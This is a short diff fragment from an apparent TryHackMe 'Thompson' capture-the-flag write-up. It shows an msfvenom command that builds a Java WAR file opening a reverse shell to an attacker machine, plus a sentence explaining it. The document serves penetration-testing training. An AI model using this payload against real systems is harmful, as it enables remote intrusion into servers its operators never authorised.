garrettsgr/OSCP-Checklist-Writeups/tryhackme/Thompson.md

 `msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.152.252 LPORT=9001 -f war > reverse.war`

-+ The attacker used the following command to build a .war file that will send a reverse connection back to the attacker machine -
++ The attacker used the following command to build a .war file that will send a reverse connection back to the attacker machine.

 <br>